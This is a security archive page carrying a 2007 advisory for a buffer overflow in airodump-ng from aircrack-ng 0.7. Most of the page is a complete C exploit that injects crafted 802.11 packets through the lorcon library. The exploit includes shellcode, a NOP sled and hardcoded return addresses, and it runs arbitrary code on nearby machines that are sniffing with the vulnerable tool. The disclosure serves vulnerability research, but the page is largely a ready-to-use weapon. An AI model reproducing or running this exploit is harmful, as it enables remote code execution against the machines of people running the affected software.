exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

airodump-ng.txt

airodump-ng.txt
Posted Apr 12, 2007
Authored by Jonathan So | Site nop-art.net

Aircrack-ng version 0.7 suffers from a buffer overflow vulnerability. Full exploit provided.

tags | exploit, overflow
SHA-256 | 6582f5ccdd7c448ca04681f9147f6023c764bd542165cfa411535d9790da8333

airodump-ng.txt

Change Mirror Download
Product Name: Aircrack-ng (0.7)
Vendor: http://www.aircrack-ng.org
Date: 13 April, 2007
Author: Jonathan So < jonny [ @ ] nop-art [ dot ] net>
Advisory URL: http://www.nop-art.net/advisories/airodump-ng.txt

I. DESCRIPTION

A buffer overflow vulnerability has been found in airodump-ng, part of
the aircrack-ng package. The vulnerability could allow an attacker to
transmit specially crafted 802.11 packets to execute arbitrary code on
a remote machine running the airodump-ng tool.

II. DETAILS

Airodump-ng fails to check the size of 802.11 authentication packets
before copying into an insufficiently sized global buffer. As a result
it is possible to overwrite another global variable passed as the size
parameter to a subsequent memcpy() operation, in order to overflow a
stack buffer. Airodump-ng must be logging packets with the -w or
--write option to be vulnerable to this attack. The wireless device
must also be capturing packets in monitor mode.

This vulnerability has been successfully exploited against on an x86
Linux 2.6.20 machine running airodump-ng 0.7. Other versions and
platforms are also likely to be affected.

III. CREDIT

Discovered by Jonathan So
Additional thanks to Ash Willis

IV. EXPLOIT

/**
* airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit
*
* Proof of concept exploit for a stack (and heap) based
* overflow in airodump-ng. The vulnerability can be exploited
* by transmitting some specially crafted 802.11 packets to
* execute arbitrary code on any machines within range
* that are sniffing with a vulnerable version of airodump-ng.
*
* This exploit requires the lorcon 802.11 packet injection
* library, see http://802.11ninja.net for details.
*
* Compiling:
*
* gcc -o airodump-remote airodump-remote.c -lorcon
*
* Usage:
*
* ./airodump-ng <interface> <driver> <channel> <headertype> [return addr]
*
* Drivers supported by lorcon:
*
* wlan-ng, hostap, airjack, prism54, madwifing, madwifiold,
* rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw
*
* Header types:
*
* 0 - None (not tested)
* 1 - Fake prism54 header
* 2 - Fake radiotap header (not tested)
*
* Return addresses:
*
* Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934
* Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934
*
* Example usage:
*
* ./airodump-ng wlan0 prism54 11 1 0x8054934
*
* Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt
* Author: Jonathan So [ jonny [ @ ] nop-art.net ]
*
* Copyright (C) 2007 Jonathan So
*/

#include <stdio.h>
#include <stdlib.h>
#include <tx80211.h>

// Linux x86 sys_write shellcode. Any arbitrary shellcode should work
// here, it doesn't matter if it contains nulls. Maximum 792 bytes.

char shellcode[] =
"\xeb\x14" // jmp get_message

// start:
"\x59\x31\xdb\x31\xd2\xb2"
"\x1b" // message length
"\x31\xc0\x88\x04\x11"
"\xb0\x04\xcd\x80" // sys_write
"\xb0\x01\xcd\x80" // sys_exit

// get_message:
"\xe8\xe7\xff\xff\xff" // call start
"Stop sniffing our network!!"; // message text

int main(int argc, char **argv)
{
tx80211_t tx;
tx80211_packet_t txp;
uint8_t packet[1044];
uint8_t *ppacket;

int headertype;
unsigned ret_addr = 0x8054934;
FILE *fp;

if(argc<5) {
printf("usage: %s <interface> <driver> <channel> <arptype> [ret_addr]\n", argv[0]);
exit(1);
}

if(argc>5) {
ret_addr = strtoul(argv[5], NULL, 16);
}

headertype = atoi(argv[4]);

if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) != TX80211_ENOERR) {
fprintf(stderr, "Error initializing driver");
return 1;
}

if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) != TX80211_ENOERR) {
fprintf(stderr, "Error setting inject mode\n");
return 1;
}

if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) {
fprintf(stderr, "Error setting channel\n");
}

if (tx80211_open(&tx) < 0) {
fprintf(stderr, "Unable to open interface\n");
return 1;
}

txp.packet = packet;

// Fill packet with nops
memset(packet, 0x90, sizeof(packet));

switch (headertype) {
case 0:
// No arptype, just send raw packet
ppacket = packet;
break;
case 1:
// Send fake prism header
memcpy(packet+4, "\x08\x00\x00\x00", 4);
ppacket = packet + 8;
break;
case 2:
// Send fake radiotap header
packet[0] = 0;
packet[2] = 3;
ppacket = packet + 3;
break;
default:
printf("Invalid header type. Valid options are:\n");
printf(" 0 - none\n");
printf(" 1 - prism54\n");
printf(" 2 - radiotap\n");
return 1;
}

// set some necessary 802.11 header fields
ppacket[0] = 0xB0;
ppacket[1] = 0;
ppacket[24] = 1;
ppacket[25] = 0;
ppacket[26] = 2;
ppacket[27] = 0;

txp.plen = 512 + (ppacket - packet);
if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 1\n");
return 1;
}

ppacket[26] = 4;

if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 2\n");
return 1;
}

// Insert shellcode at end of nopsled
memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode));

// Overwrite some char*, needs to be a valid address
memcpy(ppacket+1028, &ret_addr, 4);

// Overwrite global variable sk_len, used as argument to memcpy
memcpy(ppacket+1032, "\x20\x05\x00\x00", 4);

// Return address
memcpy(ppacket+820, &ret_addr, 4);

ppacket[1] = 0x40;
txp.plen = 1036 + + (ppacket - packet);

if (tx80211_txpacket(&tx, &txp) < txp.plen) {
fprintf(stderr, "Error sending packet 3\n");
return 1;
}

tx80211_close(&tx);

return 0;
}
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close